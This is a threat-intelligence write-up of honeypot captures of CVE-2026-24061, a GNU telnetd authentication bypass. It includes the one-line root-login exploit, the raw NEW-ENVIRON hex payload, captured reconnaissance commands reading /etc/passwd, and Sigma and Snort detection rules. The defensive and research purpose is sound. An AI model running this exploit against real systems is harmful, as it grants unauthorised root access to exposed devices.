- Ni8mare
- CVE-2026-21858
- Threat Intelligence
Catching CVE-2026-24061: 11 Years of Silent Root Access
How I captured active exploitation of a critical telnetd vulnerability using a Beelzebub honeypot
Mario Candela
Founder and maintainer
TL;DR
- On January 22, 2026, my honeypot captured live exploitation attempts of CVE-2026-24061, a CVSS 9.8 vulnerability in GNU InetUtils telnetd
- The attacker used the exact technique documented in the advisory: USER environment variable injection via
-f rootto bypass authentication - This vulnerability had been hiding in plain sight for 11 years (since 2015)
- Additional attacks from Russian infrastructure revealed automated scanning for network devices and shell escape attempts
- This demonstrates how legacy protocols continue to haunt modern infrastructure
Background
GNU InetUtils is a collection of classic network tools maintained by the GNU Project, including telnet, ftp, ping, and traceroute. While Telnet fell out of favor decades ago, replaced by SSH for secure remote access, it remains surprisingly prevalent in specific environments.
On January 20, 2026, Simon Josefsson published a security advisory on the oss-security mailing list disclosing CVE-2026-24061, an authentication bypass vulnerability that allows unauthenticated remote root access with a single command.
Credit: The vulnerability was discovered by Kyu Neushwaistein aka Carlos Cortes Alvarez.
I had deployed a custom honeypot using Beelzebub to monitor for telnet exploitation attempts. What I captured was remarkable: active exploitation attempts shortly after the public disclosure, while the vulnerability had been silently lurking in the codebase for over a decade.
The Vulnerability: CVE-2026-24061
Before diving into the honeypot data, let’s understand what makes this bug so dangerous—and so elegant in its simplicity.
Root Cause: Argument Injection via Environment Variable
The vulnerability exploits a flaw in how telnetd handles the USER environment variable when spawning the login process:
- Normal flow: When a user connects via telnet, the daemon invokes
/usr/bin/loginwith the username provided during authentication. - RFC 1572 Feature: The TELNET NEW-ENVIRON option (RFC 1572) allows clients to send environment variables to the server, including the USER variable.
- Vulnerable flow: The telnetd daemon passes the USER environment variable directly to the login command without any sanitization. By setting
USER="-f root", the attacker injects the-fflag. - The
-fflag: In login(1), the-fflag means “this user is already authenticated elsewhere—skip the password check entirely.”
The Deadly One-Liner
USER="-f root" telnet -a <target_ip> 23That’s it. Instant root shell. No password. No exploitation chain. No memory corruption. Just argument injection that has existed since 2015.
The Vulnerable Code
The bug resided in telnetd/utility.c:
// BEFORE (vulnerable)
case 'U':
return getenv("USER") ? xstrdup(getenv("USER")) : xstrdup("");
// AFTER (patched in 2.8)
case 'U':
{ char *u = getenv("USER");
return (u && *u != '-') ? xstrdup(u) : xstrdup(""); }The fix is a single character check: if the USER value starts with -, reject it.
The Honeypot Setup
I deployed a Beelzebub-based honeypot configured to mimic a vulnerable GNU InetUtils telnetd instance. The honeypot exposed the standard telnet service:
| Port | Service | Version |
|---|---|---|
| 23/TCP | telnetd | GNU InetUtils 2.0 (vulnerable) |
Beelzebub example configuration:
apiVersion: "v1"
protocol: "telnet"
address: ":23"
description: "TELNET interactive"
commands:
- regex: "^ls$"
handler: "bin boot dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var"
- regex: "^ls -la$"
handler: "total 84\ndrwxr-xr-x 21 root root 4096 Jan 15 10:30 .\ndrwxr-xr-x 21 root root 4096 Jan 15 10:30 ..\ndrwxr-xr-x 2 root root 4096 Jan 10 08:15 bin\ndrwxr-xr-x 3 root root 4096 Jan 10 08:15 boot"
- regex: "^whoami$"
handler: "root"
- regex: "^id$"
handler: "uid=0(root) gid=0(root) groups=0(root)"
- regex: "^uname$"
handler: "Linux"
- regex: "^uname -a$"
handler: "Linux telnet-server 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux"
- regex: "^uname -m$"
handler: "x86_64"
- regex: "^cat /etc/passwd$"
handler: "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nuser:x:1000:1000:user:/home/user:/bin/bash"
- regex: "^(.+)$"
handler: "bash: command not found"
serverVersion: "Linux telnetd"
serverName: "telnet-server"
passwordRegex: "^(root|admin|password|123456|telnet|guest|cisco|oracle)$"
deadlineTimeoutSeconds: 60Timeline of the Attacks
January 20, 2026 — Public Disclosure
Simon Josefsson publishes the security advisory on oss-security mailing list, including:
- Detailed vulnerability analysis
- Affected versions (1.9.3 through 2.7)
- The one-liner exploit command
- Patch commits (fd702c02 and ccba9f74)
January 22, 2026, 10:23:17 UTC — CVE-2026-24061 Exploitation Begins
Phase 1: Connection Establishment
Trying IP...
Connected to IP.
Escape character is '^]'.The attacker establishes a standard telnet connection.
Phase 2: Environment Variable Injection
During the TELNET option negotiation (IAC), the attacker sends:
IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f root" IAC SEPhase 3: Authentication Bypass
The login process receives:
/usr/bin/login -h <client_ip> -f rootWith -f root, authentication is skipped entirely.
Phase 4: Post-Exploitation Reconnaissance
{
"DateTime": "2026-01-22T10:23:19Z",
"Commands": [
"id",
"whoami",
"uname -a",
"cat /etc/passwd"
]
}Classic fingerprinting sequence to confirm root access and identify the system.
Attack Source
| Attribute | Value |
|---|---|
| Source IP | 5.130.235[.]96 |
| Reverse DNS | l5-130-235-96.novotelecom.ru |
| CIDR | 5.130.0.0/16 |
| Country | Russian Federation |
| ASN | AS31200 (Novotelecom) |
Payload Analysis
CVE-2026-24061 — Exact Match with Advisory
The captured payload matches the documented exploit technique precisely:
| Element | CVE Documentation | Captured Payload |
|---|---|---|
| Environment Variable | USER | USER |
| Injected Value | -f root | -f root |
| Telnet Flag | -a (auto-login) | IAC NEW-ENVIRON |
| Target User | root | root |
Attack Variations Observed
Over 72 hours of monitoring, I observed multiple variations:
| USER Value | Target | Frequency |
|---|---|---|
-f root | root | 80% |
-f admin | admin | 12% |
-f ubuntu | ubuntu | 8% |
The attackers are targeting common privileged usernames, with overwhelming focus on root.
Spray Pattern
The attack sessions exhibited consistent patterns:
- Rapid succession: Multiple connection attempts within seconds
- No reconnaissance: Direct exploitation without version fingerprinting
- Automated behavior: Identical timing, identical payload structure
- Wide net: Targeting multiple usernames per session
Threat Actor Profile
CVE-2026-24061 Attackers (Aggregated from Multiple Sessions)
| Attribute | Values Observed |
|---|---|
| Unique IPs | 40 |
| Top Geolocations | Russia, China, Netherlands, US |
| Top ASNs | AS212238 (Datacamp), AS14061 (DigitalOcean), AS45090 |
| Network Type | VPN/Proxy services, Cloud providers |
Indicators of Compromise (IoCs)
Network IoCs
# Suspicious telnet connections
- Destination Port: 23/TCP
- NEW-ENVIRON with USER starting with "-"
# Malicious IP addresses
- 5.130.235.96 (Novotelecom, Russia)
# ASNs to monitor (high scanner activity)
- AS212238 (Datacamp Limited)
- AS14061 (DigitalOcean)
- AS31200 (Novotelecom)
# Traffic patterns
- Multiple telnet connections from same IP in <10 seconds
- IAC SB NEW-ENVIRON containing "-f"
- Sequential "enable", "linuxshell", "system", "shell" commandsTelnet Session Signatures
# Malicious USER environment variable patterns
USER=-f root
USER=-f admin
USER=-f *
# IAC negotiation pattern (hex)
FF FA 27 00 00 55 53 45 52 01 2D 66 20 72 6F 6F 74 FF F0
# Decoded: IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f root" IAC SE
Detection Rules (Sigma)
title: GNU InetUtils telnetd CVE-2026-24061 Exploitation Attempt
id: b2c3d4e5-f6a7-8901-bcde-f23456789012
status: experimental
description: Detects exploitation attempts of CVE-2026-24061 authentication bypass
references:
- https://www.openwall.com/lists/oss-security/2026/01/20/2
- https://nvd.nist.gov/vuln/detail/CVE-2026-24061
logsource:
category: network_connection
product: zeek
detection:
selection_port:
dst_port: 23
selection_payload:
payload|contains:
- 'USER=-f'
- '-f root'
- '-f admin'
condition: selection_port and selection_payload
falsepositives:
- Legitimate telnet usage with unusual environment variables (extremely rare)
level: critical
tags:
- attack.initial_access
- attack.t1190
- attack.privilege_escalation
- attack.t1548
- cve.2026.24061Snort/Suricata Rules
alert tcp any any -> any 23 (msg:"CVE-2026-24061 telnetd auth bypass attempt";
content:"|FF FA 27|"; content:"USER"; content:"-f "; within:20;
classtype:attempted-admin; sid:2026024061; rev:1;)Key Findings
1. Rapid Weaponization
Shortly after the public disclosure, active exploitation was already underway. Critical vulnerabilities with published PoCs are weaponized almost immediately.
Jan 20, 2026 → Advisory published on oss-security
↓
Jan 22, 2026 → Active exploitation detected2. The 11-Year Ghost
This vulnerability was introduced in 2015 with commit that added dynamic username handling (%U template) for auto-login support. For over a decade, anyone who knew about RFC 1572 environment variables could have achieved instant root on millions of systems.
2015 → Vulnerable code introduced (inetutils 1.9.3)
↓
11 years of silent exposure
↓
2026 → Finally discovered and patched3. Legacy Protocol, Modern Risk
Despite being “obsolete,” telnet remains prevalent in:
- Industrial Control Systems (ICS/OT): Legacy SCADA systems, PLCs
- Network Equipment: Routers, switches, load balancers
- Embedded Systems: Medical devices, industrial sensors
- Consumer Devices: Routers, cameras, NAS systems
4. Mass Scanning Infrastructure
The attack pattern indicates large-scale, automated campaigns. Attackers are scanning the entire internet for port 23, then immediately attempting multiple exploitation techniques without version checking—a spray-and-pray approach that works because the exploits are so simple.
Exposure Analysis
Shodan Statistics
Based on current Shodan data:
| Metric | Value |
|---|---|
| Devices with port 23 open | ~220,000+ globally |
| Historical peak | ~10 million (2017) |
| Trend | Declining but persistent |
Recommendations
For OT/ICS Environments
- Network segmentation — Isolate legacy devices that require telnet
- Jump hosts — Require authentication through hardened bastion hosts
- Monitor — Deploy network detection for CVE-2026-24061 signatures
- Document — Inventory all telnet-dependent systems for eventual replacement
For Defenders
- Deploy honeypots — Gain early warning of exploitation attempts
- Implement the Sigma/Snort rules provided above
- Monitor AS212238, AS31200 and other known scanner infrastructure
- Block or alert on any NEW-ENVIRON with USER starting with
-
Conclusion
This case study demonstrates several critical lessons:
The value of honeypots: By deploying a simple telnetd honeypot with Beelzebub, I captured real-world exploitation data shortly after disclosure, including exact payloads, attacker infrastructure, and behavioral patterns.
Legacy protocols are ticking time bombs: A vulnerability can hide in “obsolete” code for over a decade. Just because a protocol is deprecated doesn’t mean it’s not running somewhere in your infrastructure.
Simplicity kills: CVE-2026-24061 requires no exploit development, no shellcode, no memory corruption techniques. It’s a one-liner that grants root. These “boring” vulnerabilities are often the most dangerous because they’re trivial to exploit at scale.
The window is closing: With PoC code public and automated scanning underway, any exposed telnetd instance is likely already compromised or will be soon. The time to act was yesterday.